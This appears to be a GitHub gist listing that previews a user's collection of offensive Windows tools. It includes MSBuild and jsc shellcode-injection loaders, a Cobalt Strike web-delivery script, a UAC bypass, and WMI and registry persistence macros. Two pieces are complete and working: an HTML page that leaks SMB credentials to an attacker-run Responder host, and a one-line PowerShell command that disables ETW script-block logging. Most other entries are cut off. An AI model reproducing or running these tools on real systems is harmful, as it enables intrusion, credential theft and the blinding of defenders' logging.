0x4243
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import System; | |
| import System.Runtime.InteropServices; | |
| import System.Reflection; | |
| import System.Reflection.Emit; | |
| import System.Runtime; | |
| import System.Text; | |
| //C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js | |
| //C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js | |
0x4243
/ gifjs.asm
Created
September 1, 2017 14:14
— forked from ajinabraham/gifjs.asm
A Valid GIF and JS file
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; a hand-made GIF containing valid JavaScript code | |
| ; abusing header to start a JavaScript comment | |
| ; inspired by Saumil Shah's Deadly Pixels presentation | |
| ; Ange Albertini, BSD Licence 2013 | |
| ; yamal gifjs.asm -o img.gif | |
| WIDTH equ 10799 ; equivalent to 2f2a, which is '/*' in ASCII, thus starting an opening comment |
0x4243
/ msbuildQueueAPC.csproj
Created
September 2, 2017 18:36
MSBuild => CSC.exe Shellcode Inject using QueueUserAPC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- x86 --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj --> | |
| <!-- x64 --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask |
0x4243
/ levelup.csproj
Created
September 2, 2017 18:37
MSBuild.exe "LevelUP" - QueueUserAPC Shellcode
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe levelup.csproj --> | |
| <!-- Choose Framework based on Platform --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe levelup.csproj --> | |
| <Target Name="Hello"> | |
| <FragmentExample /> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask |
0x4243
/ fsharp.fsscript
Created
September 3, 2017 21:14
— forked from NickTyrer/fsharp.fsscript
fsi.exe inline execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" | |
| open System.Management.Automation | |
| open System.Management.Automation.Runspaces | |
| open System | |
| let runSpace = RunspaceFactory.CreateRunspace() | |
| runSpace.Open() | |
| let pipeline = runSpace.CreatePipeline() |
0x4243
/ smb-credential-leak.html
Created
October 16, 2017 08:26
— forked from mgeeky/smb-credential-leak.html
SMB Credentials leakage by MSEdge as presented in Browser Security White Paper, X41 D-Sec GmbH.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- PoC for leaking SMB Credentials with listening Responder --> | |
| <!-- as presented by X41 D-Sec GmbH in Browser Security White Paper. --> | |
| <!-- To be used as: $ `responder -I eth0 -w -r f -v` --> | |
| <body onmousemove="document.getElementById(6).click()"> | |
| <a id=6 href="\\192.168.56.101\edgeleak" download></a> | |
| </body> |
0x4243
/ stagelessweb.cna
Created
November 8, 2017 12:12
— forked from rsmudge/stagelessweb.cna
A stageless variant of the PowerShell Web Delivery attack. This script demonstrates the new scripting APIs in Cobalt Strike 3.7 (generate stageless artifacts, host content on Cobalt Strike's web server, build dialogs, etc.)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Scripted Web Delivery (Stageless) | |
| # | |
| # This script demonstrates some of the new APIs in Cobalt Strike 3.7. | |
| # setup our stageless PowerShell Web Delivery attack | |
| sub setup_attack { | |
| local('%options $script $url $arch'); | |
| %options = $3; | |
| # get the arch right. |
0x4243
/ akagi_42b.c
Created
November 8, 2017 12:32
— forked from hfiref0x/akagi_42b.c
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| typedef interface IFwCplLua IFwCplLua; | |
| typedef struct IFwCplLuaInterfaceVtbl { | |
| BEGIN_INTERFACE | |
| HRESULT(STDMETHODCALLTYPE *QueryInterface)( | |
| __RPC__in IFwCplLua * This, | |
| __RPC__in REFIID riid, | |
| _COM_Outptr_ void **ppvObject); |
0x4243
/ vba-windows-persistence.vbs
Created
November 10, 2017 08:45
— forked from mgeeky/vba-windows-persistence.vbs
VBA Script implementing two windows persistence methods - via WMI EventFilter object and via simple Registry Run.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' | |
| ' SYNOPSIS: | |
| ' This macro implements two windows persistence methods: | |
| ' - WMI Event Filter object creation | |
| ' - simple HKCU Registry Run value insertion. It has to be HKCU to make it work under Win10 x64 | |
| ' | |
| ' WMI Persistence method as originally presented by SEADADDY malware | |
| ' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887) | |
| ' and further documented by Matt Graeber. | |
| ' |
0x4243
/ KillETW.ps1
Created
November 18, 2017 05:06
— forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled | |
| # which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt | |
| # to bypass Suspicious ScriptBlock Logging for readability. | |
| # | |
| [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0) |